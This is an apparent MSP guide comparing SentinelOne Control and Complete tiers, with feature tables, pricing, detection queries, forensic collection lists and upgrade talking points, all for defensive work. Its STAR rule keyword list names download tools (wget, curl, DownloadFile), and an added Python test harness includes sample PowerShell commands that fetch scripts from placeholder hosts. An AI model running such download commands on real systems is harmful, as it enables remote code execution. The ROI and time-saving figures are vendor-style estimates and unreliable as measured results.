SentinelOne Control vs Complete Feature Comparison

Dylan H.

Security Operations

February 11, 2026
17 min read

SCENARIO

This document provides a comprehensive comparison between SentinelOne Singularity Control and Singularity Complete SKUs to help MSP teams understand the capabilities gained when upgrading clients, justify the additional investment to stakeholders, and ensure full utilization of Complete features.

Use this reference when:

  • Evaluating SKU options for new client deployments
  • Justifying upgrade costs to client stakeholders
  • Training team members on Complete-specific capabilities
  • Planning feature rollout after upgrading from Control to Complete
  • Conducting security posture assessments

Reference Documentation:

  • SentinelOne Platform Packages
  • Singularity Complete Overview
  • Purple AI Platform
  • Deep Visibility Datasheet
  • STAR Datasheet

REQUIREMENTS & ASSUMPTIONS

Prerequisites

  • Active SentinelOne console access
  • Understanding of endpoint security fundamentals
  • Familiarity with SentinelOne console navigation

Assumed Knowledge

  • Basic EDR/XDR concepts
  • Threat investigation workflows
  • MSP security operations procedures

SKU OVERVIEW

Singularity Platform Tiers

┌─────────────────────────────────────────────────────────────────────┐
│                    SentinelOne Singularity Platform                 │
├─────────────────┬─────────────────┬─────────────────┬───────────────┤
│      Core       │     Control     │    Complete     │  Enterprise   │
│   (Basic EPP)   │  (EPP + Basic   │ (EPP + Full EDR │ (Complete +   │
│                 │   EDR Controls) │    + XDR)       │   Add-ons)    │
├─────────────────┼─────────────────┼─────────────────┼───────────────┤
│ • Static AI     │ • All Core      │ • All Control   │ • All Complete│
│ • Behavioral AI │ • Firewall Ctrl │ • Deep Visibility│ • Ranger     │
│ • NGAV          │ • Device Control│ • STAR Rules    │ • Identity    │
│ • Auto-mitigate │ • Network Ctrl  │ • Remote Shell  │ • Cloud       │
│                 │ • Rogue Device  │ • Purple AI     │ • Vigilance   │
│                 │   Detection     │ • File Fetch    │   MDR         │
│                 │                 │ • 1-Click Rollback│             │
│                 │                 │ • XDR Correlation│             │
└─────────────────┴─────────────────┴─────────────────┴───────────────┘

Pricing Reference (2025)

| SKU | List Price | Typical MSP Price | Use Case |
|---|---|---|---|
| Core | ~$45/endpoint/year | ~$30-40 | Basic protection only |
| Control | ~$79/endpoint/year | ~$55-65 | Standard managed clients |
| Complete | ~$99/endpoint/year | ~$70-85 | Security-conscious clients |
| Enterprise | Custom | Custom | Large enterprise with add-ons |

ROI Consideration: The $20/endpoint/year upgrade from Control to Complete provides significant investigation and response capabilities that can reduce incident response time by 60%+ and justify the investment through labor savings.


DETAILED FEATURE COMPARISON

Protection Features (Both SKUs)

| Feature | Control | Complete | Notes |
|---|---|---|---|
| Static AI Detection | ✅ | ✅ | Pre-execution file analysis |
| Behavioral AI Detection | ✅ | ✅ | Runtime behavior monitoring |
| Next-Gen Antivirus (NGAV) | ✅ | ✅ | Signature + AI-based |
| Exploit Protection | ✅ | ✅ | Memory/exploit prevention |
| Ransomware Protection | ✅ | ✅ | Behavioral + rollback |
| Scripts & Documents | ✅ | ✅ | Malicious script blocking |
| Lateral Movement Detection | ✅ | ✅ | Network-based detection |
| Automated Threat Mitigation | ✅ | ✅ | Kill, quarantine, remediate |
| Cloud Intelligence | ✅ | ✅ | Reputation-based detection |
| Anti-Tamper Protection | ✅ | ✅ | Agent self-protection |

Control Features (Both SKUs)

| Feature | Control | Complete | Notes |
|---|---|---|---|
| Firewall Control | ✅ | ✅ | Host-based firewall management |
| Device Control | ✅ | ✅ | USB/removable media policies |
| Network Control | ✅ | ✅ | Network isolation capability |
| Rogue Device Detection | ✅ | ✅ | Unmanaged device discovery |
| Application Inventory | ✅ | ✅ | Installed software tracking |
| Vulnerability Assessment | ✅ | ✅ | Known CVE detection |

EDR/XDR Features (Complete Only)

| Feature | Control | Complete | Business Value |
|---|---|---|---|
| Deep Visibility | ❌ | ✅ | Full endpoint telemetry for hunting |
| Storyline Technology | ❌ | ✅ | Automated attack correlation |
| STAR Custom Rules | ❌ | ✅ | Custom detection logic |
| Remote Shell | ❌ | ✅ | Live endpoint investigation |
| File Fetch | ❌ | ✅ | Remote file retrieval for forensics |
| 1-Click Rollback | ❌ | ✅ | Ransomware recovery |
| Purple AI | ❌ | ✅ | AI-powered investigation assistant |
| XDR Correlation | ❌ | ✅ | Cross-endpoint threat correlation |
| Extended Data Retention | 14 days | 14 days* | *Upgradeable to 30/90/365 days |
| Threat Intelligence | Basic | Full | IOC enrichment and context |
| MITRE ATT&CK Mapping | ❌ | ✅ | TTP identification |
| Investigation Notebooks | ❌ | ✅ | Collaborative investigation docs |

COMPLETE-EXCLUSIVE FEATURES DEEP DIVE

1. Deep Visibility (EDR Telemetry)

What It Is: Deep Visibility is SentinelOne's endpoint detection and response (EDR) data collection engine that captures comprehensive endpoint telemetry for threat hunting and forensic investigation.

Capabilities:

  • Process execution tracking (parent/child relationships)
  • File operations (create, modify, delete, rename)
  • Network connections (source, destination, ports, protocols)
  • Registry modifications
  • DNS queries
  • Login events
  • Module loads (DLLs, drivers)
  • Cross-process operations

Query Language (S1QL):

-- Example: Find PowerShell executing encoded commands
EventType = "Process Creation" AND
ProcessName = "powershell.exe" AND
ProcessCmd CONTAINS "-enc"
 
-- Example: Detect lateral movement via PsExec
EventType = "Process Creation" AND
(ProcessName = "psexec.exe" OR
 ProcessName = "psexesvc.exe")
 
-- Example: Find files created in Temp folders
EventType = "File Creation" AND
FilePath CONTAINS "\Temp\" AND
FileExtension IN (".exe", ".dll", ".ps1", ".bat")

Data Retention:

  • Default: 14 days
  • Upgradeable: 30, 90, or 365 days (additional cost)

Use Cases:

| Scenario | Deep Visibility Query |
|---|---|
| Threat Hunting | Search for IOCs across all endpoints |
| Incident Investigation | Trace attack timeline and scope |
| Compliance Audit | Verify user/process activity |
| Forensics | Collect evidence for legal proceedings |

Console Location: Visibility → Deep Visibility


2. Storyline Technology

What It Is: Patented AI technology that automatically correlates related events (processes, files, network connections, registry changes) into a coherent attack narrative.

How It Works:

Traditional EDR: Individual disconnected alerts
┌─────┐ ┌─────┐ ┌─────┐ ┌─────┐ ┌─────┐
│Alert│ │Alert│ │Alert│ │Alert│ │Alert│
└─────┘ └─────┘ └─────┘ └─────┘ └─────┘
   ↓        ↓       ↓       ↓       ↓
Manual correlation required by analyst

SentinelOne Storyline: Auto-correlated attack story
┌─────────────────────────────────────────────────┐
│                   Storyline                      │
│  ┌─────┐    ┌─────┐    ┌─────┐    ┌─────┐      │
│  │Email│───→│Macro│───→│PS   │───→│C2   │      │
│  │Open │    │Exec │    │Down │    │Conn │      │
│  └─────┘    └─────┘    └─────┘    └─────┘      │
│                                                 │
│  Full context: User, time, files, network, etc. │
└─────────────────────────────────────────────────┘

Benefits:

  • Reduces investigation time from hours to minutes
  • Eliminates manual event correlation
  • Provides complete attack context
  • Enables faster, more accurate response decisions

Storyline ID: Every related event shares a Storyline ID, allowing single-query retrieval of entire attack chains:

StorylineId = "ABC123XYZ..."

Console Location: Threats → Click any threat → Storyline tab


3. STAR (Storyline Active Response) Custom Rules

What It Is: Cloud-based automated hunting, detection, and response engine that allows creation of custom detection rules without agent updates.

Capabilities:

  • Convert Deep Visibility queries into automated detections
  • Create custom rules based on your environment
  • Map rules to MITRE ATT&CK framework
  • Define automated response actions
  • Deploy rules instantly across all endpoints

Rule Components:

STAR Rule Structure:
  Name: "Detect Suspicious PowerShell Download"
  Description: "Detects PowerShell downloading files from internet"
  Severity: High
  MITRE: T1059.001 (Command and Scripting Interpreter: PowerShell)
 
  Query: |
    EventType = "Process Creation" AND
    ProcessName = "powershell.exe" AND
    (ProcessCmd CONTAINS "DownloadFile" OR
     ProcessCmd CONTAINS "Invoke-WebRequest" OR
     ProcessCmd CONTAINS "wget" OR
     ProcessCmd CONTAINS "curl")
 
  Response:
    - Alert: True
    - Kill Process: Optional
    - Network Quarantine: Optional

Default Rules: Complete includes 100+ pre-built STAR rules covering:

  • Common attack techniques
  • MITRE ATT&CK TTPs
  • Industry-specific threats
  • Emerging threat indicators

Use Cases:

| Scenario | STAR Rule Application |
|---|---|
| Zero-Day Response | Create detection for new IOCs within minutes |
| Compliance | Detect policy violations (unauthorized software) |
| Industry Threats | Add rules for sector-specific attacks |
| Internal Threats | Monitor for data exfiltration patterns |

Console Location: Sentinels → STAR Rules
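
A dry run of the "Detect Suspicious PowerShell Download" rule shown above, run over constructed events before any automated response is switched on. This is an added example, not SentinelOne's or the author's code: the Python predicate mirrors the rule's Query block, the event records, hostnames and want_alert labels are constructed, and whether CONTAINS matches case-sensitively is treated as an assumption and tested both ways.

```python
"""Offline dry run of the page's example STAR rule over constructed events."""

# Substrings taken from the rule's Query block on the page.
DOWNLOAD_MARKERS = ("DownloadFile", "Invoke-WebRequest", "wget", "curl")


def contains(text, needle, case_sensitive):
    """Substring match; case handling is a parameter because it is an assumption here."""
    if case_sensitive:
        return needle in text
    return needle.lower() in text.lower()


def rule_matches(event, case_sensitive=True):
    """EventType AND ProcessName AND (any download marker in ProcessCmd)."""
    return (
        event["EventType"] == "Process Creation"
        and event["ProcessName"] == "powershell.exe"
        and any(contains(event["ProcessCmd"], m, case_sensitive) for m in DOWNLOAD_MARKERS)
    )


def ev(eid, etype, pname, cmd, want_alert):
    """Build one constructed telemetry record with the analyst's expected verdict."""
    return {"id": eid, "EventType": etype, "ProcessName": pname,
            "ProcessCmd": cmd, "want_alert": want_alert}


# Constructed sample events (not real telemetry); example.test hosts are placeholders.
EVENTS = [
    ev("e1", "Process Creation", "powershell.exe",
       r"powershell.exe -Command (New-Object Net.WebClient).DownloadFile('http://files.example.test/a.ps1','C:\Temp\a.ps1')", True),
    ev("e2", "Process Creation", "powershell.exe",
       r"powershell.exe -Command Invoke-WebRequest -Uri https://intranet.example.test/health -UseBasicParsing", False),
    ev("e3", "Process Creation", "powershell.exe",
       r"powershell.exe -Command Get-Content C:\Tools\curl-8.0\README.txt", False),
    ev("e4", "Process Creation", "cmd.exe",
       r"cmd.exe /c curl https://intranet.example.test/health", False),
    ev("e5", "File Creation", "powershell.exe",
       r"powershell.exe -Command Invoke-WebRequest -Uri https://intranet.example.test/health", False),
    ev("e6", "Process Creation", "powershell.exe",
       r"powershell.exe -command invoke-webrequest -uri http://files.example.test/b.ps1 -outfile C:\Temp\b.ps1", True),
]


def dry_run(events, case_sensitive=True):
    """Group event ids into true positives, false positives and misses."""
    result = {"true_positive": [], "false_positive": [], "missed": []}
    for event in events:
        hit = rule_matches(event, case_sensitive)
        if hit and event["want_alert"]:
            result["true_positive"].append(event["id"])
        elif hit:
            result["false_positive"].append(event["id"])
        elif event["want_alert"]:
            result["missed"].append(event["id"])
    return result


def safe_for_auto_response(result):
    """Keep the rule alert-only until the dry run shows no false positives or misses."""
    return not result["false_positive"] and not result["missed"]


if __name__ == "__main__":
    for mode in (True, False):
        outcome = dry_run(EVENTS, case_sensitive=mode)
        print("case_sensitive =", mode, outcome,
              "auto-response ok:", safe_for_auto_response(outcome))
```

The health-check and README events fire the rule in both modes, which is why the Kill Process and Network Quarantine responses stay off until the query is scoped with exclusions for known administrative scripts.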


4. Remote Shell

What It Is: Secure, audited remote command-line access to endpoints for live investigation and response without requiring separate remote access tools.

Capabilities:

  • Full PowerShell/Bash/Zsh access
  • File system navigation
  • Process management
  • Registry access (Windows)
  • Network diagnostics
  • Evidence collection

Security Controls:

Remote Shell Security:
  Authentication: Console user must be authenticated
  Authorization: Requires specific role permission
  Approval: Optional approval workflow
  Audit: Full session logging and recording
  Timeout: Configurable session timeout (default 30 min)
  Encryption: All traffic encrypted via agent-console tunnel

Common Investigation Commands:

# Windows - Check running processes
Get-Process | Sort-Object CPU -Descending | Select-Object -First 20
 
# Windows - Check network connections
Get-NetTCPConnection -State Established | Select-Object LocalAddress, LocalPort, RemoteAddress, RemotePort, OwningProcess
 
# Windows - Check scheduled tasks
Get-ScheduledTask | Where-Object {$_.State -eq "Ready"}
 
# Windows - Check startup items
Get-CimInstance Win32_StartupCommand | Select-Object Name, Command, Location
 
# Windows - Check recent file modifications
Get-ChildItem -Path C:\Users -Recurse -File | Where-Object {$_.LastWriteTime -gt (Get-Date).AddDays(-1)} | Select-Object FullName, LastWriteTime

Policy Configuration:

| Setting | Workstations | Servers | Executives |
|---|---|---|---|
| Enable Remote Shell | Disabled | Enabled | Disabled |
| Require Approval | N/A | Optional | N/A |
| Session Timeout | N/A | 30 min | N/A |

Console Location: Sentinels → Select Agent → Actions → Remote Shell


5. File Fetch (Forensic Collection)

What It Is: Remote file retrieval capability for collecting suspicious files, logs, or evidence from endpoints without physical access.

Capabilities:

  • Download any file from endpoint
  • Collect memory dumps
  • Retrieve logs and artifacts
  • Password-protected ZIP delivery
  • Full audit trail

Common Forensic Collections:

Windows Artifacts:
  - C:\Windows\System32\winevt\Logs\*.evtx     # Event logs
  - C:\Windows\Prefetch\*.pf                   # Prefetch files
  - C:\$MFT                                    # Master File Table
  - C:\Users\*\NTUSER.DAT                      # User registry hives
  - C:\Windows\System32\config\*               # System registry
  - C:\Users\*\AppData\Local\Microsoft\Windows\WebCache\  # Browser cache
 
Linux Artifacts:
  - /var/log/auth.log                          # Authentication logs
  - /var/log/syslog                            # System logs
  - /etc/passwd                                # User accounts
  - /etc/shadow                                # Password hashes (if permitted)
  - ~/.bash_history                            # Command history

Use Cases:

| Scenario | Files to Fetch |
|---|---|
| Malware Analysis | Suspicious executable for sandbox analysis |
| Incident Response | Event logs, prefetch, memory dump |
| Insider Threat | Browser history, file access logs |
| Compliance | Specific logs for auditors |

Console Location: Sentinels → Select Agent → Actions → Fetch Files


6. 1-Click Rollback (Ransomware Recovery)

What It Is: Automated endpoint recovery capability that reverses malicious changes (file encryption, deletions, modifications) using SentinelOne's Volume Shadow Copy integration.

How It Works:

Attack Timeline:
[T0] Normal state → Snapshot captured
[T1] Ransomware executes
[T2] Files encrypted
[T3] SentinelOne detects threat
[T4] Threat killed and quarantined
[T5] 1-Click Rollback initiated
[T6] Files restored to T0 state

Requirements:

  • Volume Shadow Copies enabled (Windows)
  • Sufficient disk space for snapshots
  • Ransomware detected before snapshot deletion
  • Policy setting enabled

Rollback Capabilities:

  • Restore encrypted files
  • Reverse registry changes
  • Remove dropped files
  • Restore deleted files

Limitations:

  • Requires VSS snapshots exist
  • Cannot restore if snapshots deleted by ransomware
  • Some file types may not be recoverable
  • Network shares typically not covered

Console Location: Threats → Select Threat → Actions → Rollback


7. Purple AI (AI Security Analyst)

What It Is: Industry's most advanced AI security analyst that translates natural language into structured queries, summarizes events, guides investigations, and provides recommended actions.

Capabilities:

Natural Language Queries:

Instead of writing:
  EventType = "Process Creation" AND ProcessName = "powershell.exe"
  AND ProcessCmd CONTAINS "-enc"

Simply type:
  "Show me all encoded PowerShell commands in the last 24 hours"

Investigation Assistance:

  • Summarizes complex attack storylines
  • Recommends next investigation steps
  • Generates executive summaries
  • Creates investigation notebooks
  • Suggests response actions

Auto-Triage:

  • Automatically assesses alert severity
  • Determines true positive likelihood
  • Provides verdict reasoning
  • Reduces alert fatigue

Auto-Investigation (Athena Release):

  • End-to-end agentic investigations
  • Dynamic reasoning and pivoting
  • Impact analysis
  • Recommended custom rule creation
  • Response recommendations

Sample Purple AI Interactions:

Analyst: "What happened on endpoint WORKSTATION-123 yesterday?"

Purple AI: "Based on Deep Visibility data, WORKSTATION-123 had the
following notable activity:
- 09:15 AM: User john.doe logged in
- 10:32 AM: PowerShell executed suspicious encoded command
- 10:33 AM: Network connection to 185.x.x.x (known C2)
- 10:34 AM: SentinelOne blocked and quarantined threat

Recommended next steps:
1. Review the full Storyline (link)
2. Check other endpoints for similar activity
3. Block the C2 IP at firewall level
4. Reset user credentials as precaution

Would you like me to run these queries?"

Console Location: Purple AI icon (top navigation) or Visibility → Purple AI


8. XDR Correlation

What It Is: Extended Detection and Response capabilities that correlate threats across multiple endpoints and integrated data sources.

Correlation Capabilities:

  • Cross-endpoint attack detection
  • Lateral movement tracking
  • Campaign identification
  • IOC propagation tracking

Integrated Data Sources (with add-ons):

  • Cloud workloads (AWS, Azure, GCP)
  • Identity providers (Azure AD, Okta)
  • Network security (Zscaler, Palo Alto, Fortinet)
  • Email security (Proofpoint, Microsoft)
  • SIEM platforms

Example XDR Scenario:

Traditional (Control):
  Endpoint A: Phishing detected ──→ Alert
  Endpoint B: Suspicious process ──→ Alert
  Endpoint C: C2 connection ──→ Alert
  (Three separate, unconnected alerts)

XDR (Complete):
  ┌─────────────────────────────────────────────┐
  │           CAMPAIGN: APT-2025-001            │
  │                                             │
  │  Endpoint A ──→ Endpoint B ──→ Endpoint C   │
  │  (Phishing)    (Lateral)      (Exfil)      │
  │                                             │
  │  Common IOCs: malware.exe, 185.x.x.x       │
  │  MITRE: T1566 → T1021 → T1041              │
  │  Affected Users: 3                          │
  │  Recommended: Isolate all, reset creds     │
  └─────────────────────────────────────────────┘

SIDE-BY-SIDE COMPARISON MATRIX

Investigation Workflow Comparison

| Task | Control | Complete |
|---|---|---|
| Alert Received | View basic alert details | Full Storyline with context |
| Understand Attack | Manual log correlation | Automatic Storyline mapping |
| Search for IOCs | Limited to threat data | Deep Visibility across all endpoints |
| Investigate Endpoint | Request physical access or use separate tool | Remote Shell instant access |
| Collect Evidence | Manual collection required | File Fetch remote retrieval |
| Create Detection | Submit to SentinelOne | Create STAR rule immediately |
| Recover from Ransomware | Restore from backup | 1-Click Rollback |
| Document Findings | Manual documentation | Purple AI notebooks |
| Hunt Proactively | Not possible | Deep Visibility + STAR Watchlists |

Time to Resolution Comparison

| Scenario | Control | Complete | Improvement |
|---|---|---|---|
| Simple Alert Triage | 15 min | 5 min | 67% faster |
| Full Investigation | 4 hours | 45 min | 81% faster |
| IOC Hunt (100 endpoints) | 2 days | 30 min | 96% faster |
| Ransomware Recovery | 8+ hours (backup) | 15 min | 97% faster |
| Custom Detection Creation | Days (vendor) | Minutes | 99% faster |
| Executive Report | 2 hours | 15 min | 87% faster |

UPGRADE JUSTIFICATION

Cost-Benefit Analysis

Scenario: 150 Endpoint Client

Annual Cost Difference:
  Control: 150 × $65 = $9,750
  Complete: 150 × $85 = $12,750
  Difference: $3,000/year

Labor Savings (Conservative):
  - Reduced investigation time: 10 hrs/month × $75/hr = $750/month = $9,000/year
  - Avoided backup restores: 2/year × $2,000 = $4,000/year
  - Proactive threat hunting: Priceless (breach prevention)

ROI: ($9,000 + $4,000) / $3,000 = 433% ROI

Client Conversation Points

For Security-Conscious Clients:

  • "Complete gives you the same tools our SOC uses to investigate threats"
  • "You get ransomware rollback that can recover files in minutes instead of hours"
  • "Purple AI means faster response even for junior analysts"

For Cost-Conscious Clients:

  • "The $20/endpoint difference pays for itself in the first investigation"
  • "Ransomware recovery alone justifies the upgrade"
  • "Reduced investigation time means lower MSP bills or faster response"

For Compliance-Focused Clients:

  • "Deep Visibility provides the forensic evidence auditors require"
  • "14+ days of telemetry for incident reconstruction"
  • "MITRE ATT&CK mapping for compliance reporting"

FEATURE ACTIVATION CHECKLIST

When upgrading a client from Control to Complete:

Immediate Configuration

  • Verify Complete SKU applied to site
  • Enable Deep Visibility data collection in policy
  • Configure data retention period (14/30/90 days)
  • Enable STAR default rules
  • Configure Remote Shell policy (servers only recommended)
  • Enable 1-Click Rollback (verify VSS enabled on endpoints)
  • Grant appropriate users Purple AI access

Team Enablement

  • Train SOC team on Deep Visibility queries
  • Create standard hunting queries library
  • Document Remote Shell procedures
  • Establish STAR rule creation workflow
  • Set up Purple AI for analysts

Ongoing Operations

  • Schedule weekly threat hunting
  • Create STAR rules for client-specific threats
  • Use Purple AI for investigation acceleration
  • Generate monthly Deep Visibility reports
  • Review and tune STAR rules quarterly

QUICK REFERENCE

Console Navigation (Complete Features)

| Feature | Console Path |
|---|---|
| Deep Visibility | Visibility → Deep Visibility |
| STAR Rules | Sentinels → STAR Rules |
| Remote Shell | Sentinels → [Agent] → Actions → Remote Shell |
| File Fetch | Sentinels → [Agent] → Actions → Fetch Files |
| Rollback | Threats → [Threat] → Actions → Rollback |
| Purple AI | Top Nav → Purple AI icon |
| Storylines | Threats → [Threat] → Storyline tab |

Common Deep Visibility Queries

-- Encoded PowerShell
EventType = "Process Creation" AND ProcessName = "powershell.exe" AND ProcessCmd CONTAINS "-enc"
 
-- Lateral Movement (PsExec)
EventType = "Process Creation" AND (ProcessName = "psexec.exe" OR ProcessName = "psexesvc.exe")
 
-- Suspicious Downloads
EventType = "File Creation" AND FilePath CONTAINS "\Downloads\" AND FileExtension IN (".exe", ".dll", ".ps1")
 
-- Scheduled Task Creation
EventType = "Scheduled Task" AND EventSubType = "Created"
 
-- Unusual Network Connections
EventType = "Network Connection" AND DstPort NOT IN (80, 443, 53) AND ThreatIndicator = True

API Endpoints (Complete Features)

# Deep Visibility Query
POST /web/api/v2.1/dv/query
 
# STAR Rules
GET /web/api/v2.1/star-rules
POST /web/api/v2.1/star-rules
 
# Remote Shell Session
POST /web/api/v2.1/agents/{agent_id}/actions/remote-shell
 
# Fetch Files
POST /web/api/v2.1/agents/{agent_id}/actions/fetch-files
 
# Rollback
POST /web/api/v2.1/threats/{threat_id}/actions/rollback

RELATED DOCUMENTATION

  • HOWTO- SentinelOne MSP Client Onboarding
  • HOWTO- SentinelOne Deep Visibility Threat Hunting (planned)
  • HOWTO- SentinelOne STAR Custom Detection Rules (planned)
  • HOWTO- SentinelOne Remote Shell Operations (planned)
  • HOWTO- SentinelOne Threat Investigation Workflow

REVISION HISTORY

| Version | Date | Author | Changes |
|---|---|---|---|
| 1.0 | 2026-01-08 | CosmicBytez | Initial creation |
